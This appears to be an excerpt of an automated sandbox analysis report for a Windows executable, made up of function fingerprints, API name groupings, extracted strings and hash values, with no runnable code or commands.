                                                            • Instruction Fuzzy Hash: C7713E25A09A8382EF54BB25E4942FCA761FF84B84FC94035DA4E477A5EF3CE5068770
                                                            APIs
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                            • String ID:
                                                            • API String ID: 1015379403-0
                                                            • Opcode ID: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                            • Instruction ID: d22a87f209d0b41effd14cc4f155574e8e17a5bf3e161c9696bd7a24358fe5df
                                                            • Opcode Fuzzy Hash: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                            • Instruction Fuzzy Hash: E602A261A096C286EF20BF25B8447F9ABA1FB84794F884239DB5D07AD4DF3CE545C720
                                                            APIs
                                                            Similarity
                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                            • String ID:
                                                            • API String ID: 3215588206-0
                                                            • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                            • Instruction ID: e0984b44e5d84802da6dcc9d0da0f1bc98b992faefa883d461a9f464d9476e04
                                                            • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                            • Instruction Fuzzy Hash: 47517D32B0CB828AEB44EB64F5581BDB3A1EB48745F594439DA0F83B85DF7CE4168324
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 281475176-2761157908
                                                            • Opcode ID: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
                                                            • Instruction ID: 7587073487912e18c82746a2f5ce7b7e4aa7c4711b8840c8d2d026be235bf19f
                                                            • Opcode Fuzzy Hash: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
                                                            • Instruction Fuzzy Hash: 40B22B72E081C28BFB25EE25E6506FDB7A1FB4438CF985135DA0957B85DF38E9048B11
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: CloseValue$ConnectCreateRegistry
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 3314541760-966354055
                                                            • Opcode ID: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
                                                            • Instruction ID: 162ee6e6d99d960ed92281e3688b991c46cc68697f02698fdd3a9349d219fd35
                                                            • Opcode Fuzzy Hash: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
                                                            • Instruction Fuzzy Hash: F2024C76B08A8286EF10EF25E4902EDB7A0FB88F94B898035DE4D57756DF38E545C360
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: P
                                                            • API String ID: 0-3110715001
                                                            • Opcode ID: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                            • Instruction ID: f280e59389bc0cc350884f657cf35f939d5d6c287150762f76760a7e32798965
                                                            • Opcode Fuzzy Hash: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                            • Instruction Fuzzy Hash: F6A18E32A0868186FB24FF25E4546EAF761FB84788F988135DB5E03A94CF7CE546C711
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Time$File$FindLocalSystem$CloseFirst
                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                            • API String ID: 3232708057-3289030164
                                                            • Opcode ID: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                            • Instruction ID: 4ed7854ac3ba407ef39c82d64582e0c7b2ae27fd5d0542a915276e54419b1c72
                                                            • Opcode Fuzzy Hash: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                            • Instruction Fuzzy Hash: B5D19062B18A9285EF10FFA5E4450FEA761FB80794FC40132EA4D47AA9EF7CD509C720
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: SendString
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 890592661-1007645807
                                                            • Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                            • Instruction ID: 072d27e9cba7a56555e12459ae99047bbd059c362d819dab020f21ecda408df4
                                                            • Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                            • Instruction Fuzzy Hash: CD214162F189D3E1EB20FB24F894AEAA721BBD4748FC84031EA4D43958DF2CD905C764
                                                            APIs
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                            • Instruction ID: 288f9e9e94772734b43bf397cc5c821fc5bc1ea1e160c5fd7a900cb4375c9088
                                                            • Opcode Fuzzy Hash: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                            • Instruction Fuzzy Hash: C771AE12A0C2C285EF34AB24B0402FAAB61EF46B88FDD0439D68E07292CF5DDD46D771
                                                            APIs
                                                            Similarity
                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                            • String ID:
                                                            • API String ID: 1255039815-0
                                                            • Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                            • Instruction ID: dc64134db0048802e47500a2c7fda268a116e53e7714c1eb53b0ab5993f4c03d
                                                            • Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                            • Instruction Fuzzy Hash: 4561AF22B0569186EF10EF61E8545FCB7B4FB44B88B8C4035DE4A53795EF39D946C3A0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                            • Instruction ID: fd669ee48a6b73e88814f4fceba0812aac0e39d6eca6280b4850b9158b0e0023
                                                            • Opcode Fuzzy Hash: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                            • Instruction Fuzzy Hash: 0A415E76A08A8285EF10FF25E8841ECA771FB88B94FD94432CA0D07755EF38E585C360
                                                            APIs
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID:
                                                            • API String ID: 2395222682-0
                                                            • Opcode ID: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                            • Instruction ID: 581a71b5e5ffeb39de4962db5d3a5c52c0e4cfd79eb0ae4294cddcb558cabb7c
                                                            • Opcode Fuzzy Hash: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                            • Instruction Fuzzy Hash: E7D16E36B04B8686EF50EF69E4901EDA3B1FB98B88B994036CE4D97B54DF38D445C360
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            Similarity
                                                            • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 4047182710-1173974218
                                                            Similarity
                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                            • String ID: ?
                                                            • API String ID: 500310315-1684325040
                                                            Similarity
                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                            • String ID:
                                                            • API String ID: 540024437-0
                                                            Similarity
                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 2649000838-1173974218
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                            • String ID: *.*
                                                            • API String ID: 1927845040-438819550
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ERCP$PCRE$VUUU$VUUU$VUUU$VUUU
                                                            • API String ID: 0-2187161917
                                                            Similarity
                                                            • API ID: ErrorLastinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 4170576061-0
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                            • String ID: .lnk
                                                            • API String ID: 3769357847-24824748
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: !$VUUU$fmod
                                                            • API String ID: 1757819995-2579133210
                                                            APIs
                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF75F182D60
                                                              • Part of subcall function 00007FF75F17B184: GetCurrentProcess.KERNEL32(00007FF75F17B21D), ref: 00007FF75F17B1B1
                                                            Similarity
                                                            • API ID: CurrentProcess_invalid_parameter_noinfo
                                                            • String ID: *$.$.
                                                            • API String ID: 2518042432-2112782162
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 2163645468-3733053543
                                                            APIs
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF75F165C43
                                                            Similarity
                                                            • API ID: DebugDebuggerErrorLastOutputPresentString
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 389471666-631824599
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID: Variable must be of type 'Object'.
                                                            • API String ID: 1385522511-109567571
                                                            APIs
                                                            Similarity
                                                            • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 1083639309-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID:
                                                            • API String ID: 1385522511-0
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $[$\
                                                            • API String ID: 0-3681541464
                                                            APIs
                                                            Similarity
                                                            • API ID: memcpy_s
                                                            • String ID:
                                                            • API String ID: 1502251526-0
                                                            APIs
                                                            Similarity
                                                            • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                            • String ID:
                                                            • API String ID: 2278415577-0
                                                            APIs
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                            • String ID:
                                                            • API String ID: 33631002-0
                                                            APIs
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .
                                                            • API String ID: 0-248832578
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF75F17475C,?,?,00000000,00007FF75F1747D9,?,?,?,?,?,00007FF75F1C2210), ref: 00007FF75F17BF3F
                                                            Strings
                                                            Similarity
                                                            • API ID: Time$FileSystem
                                                            • String ID: GetSystemTimePreciseAsFileTime
                                                            • API String ID: 2086374402-595813830
                                                            Similarity
                                                            • API ID: ExceptionRaise_clrfp
                                                            • String ID:
                                                            • API String ID: 15204871-0
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            Similarity
                                                            • API ID:
                                                            • String ID: a/p$am/pm
                                                            • API String ID: 0-3206640213
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Variable is not of type 'Object'.
                                                            • API String ID: 0-1840281001
                                                            Similarity
                                                            • API ID:
                                                            • String ID: no error
                                                            • API String ID: 0-1106124726
                                                            Similarity
                                                            • API ID: InputSend
                                                            • String ID:
                                                            • API String ID: 3431551938-0
                                                            Similarity
                                                            • API ID: mouse_event
                                                            • String ID:
                                                            • API String ID: 2434400541-0
                                                            Similarity
                                                            • API ID: BlockInput
                                                            • String ID:
                                                            • API String ID: 3456056419-0
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID:
                                                            • API String ID: 2645101109-0
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: 0
                                                            • API String ID: 3215553584-4108050209
                                                            • Opcode ID: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                            • Instruction ID: 313743ddf7f11aa14d1596b4d3f33ac456570f1009ff7c9e2e91f070bee2d6f1
                                                            • Opcode Fuzzy Hash: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                            • Instruction Fuzzy Hash: 1571D625A0C2C246FE6CFA2571402FEE7909F41B49FAC4575DD0887EE5CF2EE8458B61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: 8ef2f154a14ec1b0ccb9e07fbea3c42fb53e9d7c32ed8692c170a0c832183cc5
                                                            • Instruction ID: 50abb8f43715b7a09f787a1c3b5c4033014372a334b238dff159edbb6b543ad4
                                                            • Opcode Fuzzy Hash: 8ef2f154a14ec1b0ccb9e07fbea3c42fb53e9d7c32ed8692c170a0c832183cc5
                                                            • Instruction Fuzzy Hash: CF41B162715B8586EE04DF2AE9142E9B3A1B748FD0B8DA036DE0D87754EF3CD946C340
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d8796869ba0ff200981f3c8b4e50b33a6e54c2853832a264e2eb0800a33b39bf
                                                            • Instruction ID: 13499853c9b4a8fdc2004d9d96a7db8bc4fcb5bb44fb9eb2d95d0ce5b02f8c93
                                                            • Opcode Fuzzy Hash: d8796869ba0ff200981f3c8b4e50b33a6e54c2853832a264e2eb0800a33b39bf
                                                            • Instruction Fuzzy Hash: BF52A332A0D6C286EE24EB29E0586FCA365EF45B88F9D4535CA5E47681DF3CE440CB60
                                                            Similarity
                                                            • API ID: Concurrency::cancel_current_task
                                                            • String ID:
                                                            • API String ID: 118556049-0
                                                            • Opcode ID: 37be43e2159a7a5f12ed6e638a5f9fbb193c8301d54815e0f563e4172ea09bfa
                                                            • Instruction ID: 01c6fe968f8f2f174231f6654ec65ea3693e9dc118e5cd065181ef0105fd1432
                                                            • Opcode Fuzzy Hash: 37be43e2159a7a5f12ed6e638a5f9fbb193c8301d54815e0f563e4172ea09bfa
                                                            • Instruction Fuzzy Hash: EE526B72F0868289EF10EFA5E1542FCA3A1AB84B98F984235DE1E57BD5DF39E405C350
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a2428b1a41b9dab0837923aee02f6dd20d06634fc1108aa9b555873352bd9b52
                                                            • Instruction ID: 35294d84bd485416fcf5454b03bd1f73ab522f0454a8457688ebf8b4054096d0
                                                            • Opcode Fuzzy Hash: a2428b1a41b9dab0837923aee02f6dd20d06634fc1108aa9b555873352bd9b52
                                                            • Instruction Fuzzy Hash: 68429D32B0878286EF10EB25E5842EDB7A1FB84798FA84135DE5D47B99EF39E441C710
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                            • Instruction ID: 7e4dbf700f5d1b2d61dc67d0e2585f5731361bfb060f9fbcf4b4062bd78d0a0d
                                                            • Opcode Fuzzy Hash: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                            • Instruction Fuzzy Hash: F2424121D29ECB85EB53EB35B9115B1A324BF523C0F898333E90E76661DF2CA5478630
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                            • Instruction ID: 81b49155f55735075f551b1baa10dbc8387413d894095d5a6af860438cf5fe3c
                                                            • Opcode Fuzzy Hash: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                            • Instruction Fuzzy Hash: A2711E22E0C2C246FF68A925B6907F9E281AF41374F9C0634DA5D876D1DF7DEC419722
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                            • Instruction ID: 5a2059bd4b6a6c421814b15b449608bcfb5bd262e9d3eb30ee31478a25bc8783
                                                            • Opcode Fuzzy Hash: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                            • Instruction Fuzzy Hash: 9521D173A2448586EB08DF75E8526E973A5A360708F88C13AC52B832C4CE3CE904CB90
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                            • Instruction ID: c31a06a7721e7ba095d49154bc98170d698b36a34c66b2a9b23f7832048fea90
                                                            • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                            • Instruction Fuzzy Hash: 5DF04FB1B1D2958ADBA5DF2CB842A6DB790E708380FD48039DA8D83E44DE3D94619F14
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                            • Instruction ID: 1831ce4ec1389c6950ffb7b22eb9136e430eaea6443f32f4fe5091cf56274e50
                                                            • Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                            • Instruction Fuzzy Hash: 59A0026690ECC2D4EF08EB00F8A00B0A330EF50321BDA1532D11D418619F3CA481C330
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 3521893082-0
                                                            • Opcode ID: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
                                                            • Instruction ID: 99ba20bc434a76459926c1d3bdbbfc4e701ca8b27ba447f856f14e53eaaa88ac
                                                            • Opcode Fuzzy Hash: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
                                                            • Instruction Fuzzy Hash: D1A1A532F0468286EF14AB61A8846BC7B61BF48BA4F894334DF2E53BD4DF3C94458360
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                            • Instruction ID: 626a9f46f7f1d1a5fa2573089af5e1f836edfb8fa11f37c40b3ab5828aef81da
                                                            • Opcode Fuzzy Hash: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                            • Instruction Fuzzy Hash: 56B14E61F0CE82D0EE64FF25E8481FCA7A1BB40B84BED4135D90E47699EF2DE9458360
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
                                                            • Instruction ID: f13e1b86b1090a80bc30bfa5fd211202d19456154d9565722f3c61005423e4c5
                                                            • Opcode Fuzzy Hash: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
                                                            • Instruction Fuzzy Hash: 6E719336A08A8187EB24EB11F8846BAB761FB89BA0F454335DE5E43B94DF7CD445C720
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: tooltips_class32
                                                            • API String ID: 698492251-1918224756
                                                            • Opcode ID: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                            • Instruction ID: 6daea82095195a2c6c3f1ecddaf9c5a9e2db93f346e281c2526946e3dec02532
                                                            • Opcode Fuzzy Hash: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                            • Instruction Fuzzy Hash: 1AC13E32A087868BEB18DF65E4942EDB7A0FB89B94F940439DB6E47754DF38E841C710
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                            • String ID: @
                                                            • API String ID: 3869813825-2766056989
                                                            • Opcode ID: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                            • Instruction ID: 8aca6d88c2ae24ca24a5ab48e0166528a54e02c4261cb6f0b85e0742693795d8
                                                            • Opcode Fuzzy Hash: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                            • Instruction Fuzzy Hash: 52819272A04A82C6EB41EF75E9546AD77B0FB44B88F884531CE0E97758DF38D846C720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Color$LongWindow$ModeObjectStockText
                                                            • String ID:
                                                            • API String ID: 554392163-0
                                                            Similarity
                                                            • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 222038402-1459072770
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                            • API String ID: 2091158083-3440237614
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 1600147383-4113822522
                                                            Similarity
                                                            • API ID: Variant$ClearInit
                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                            • API String ID: 2610073882-3931177956
                                                            Similarity
                                                            • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                            • String ID: *.*
                                                            • API String ID: 1111067124-438819550
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID:
                                                            • API String ID: 2598888154-3916222277
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 2706829360-2785691316
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF75F1DFD7B), ref: 00007FF75F1E1143
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                            • String ID: *.*
                                                            • API String ID: 4125642244-438819550
                                                            Similarity
                                                            • API ID: LoadStringwprintf
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 3297454147-3080491070
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Messagewprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                            • API String ID: 4051287042-2268648507
                                                            Similarity
                                                            • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                            • String ID: BUTTON
                                                            • API String ID: 3935177441-3405671355
                                                            • Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                            • Instruction ID: cbc5bf7d930c30470fbeab0b581a64f01d3e01cbed3a6bedaf81728c044e7d7e
                                                            • Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                            • Instruction Fuzzy Hash: 8A312C65A0D6C7C2FF14BB20F8947F9A261AF85784FCD5031DA0E46695CF2CA8468F31
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 1974058525-0
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerTypewcscpy
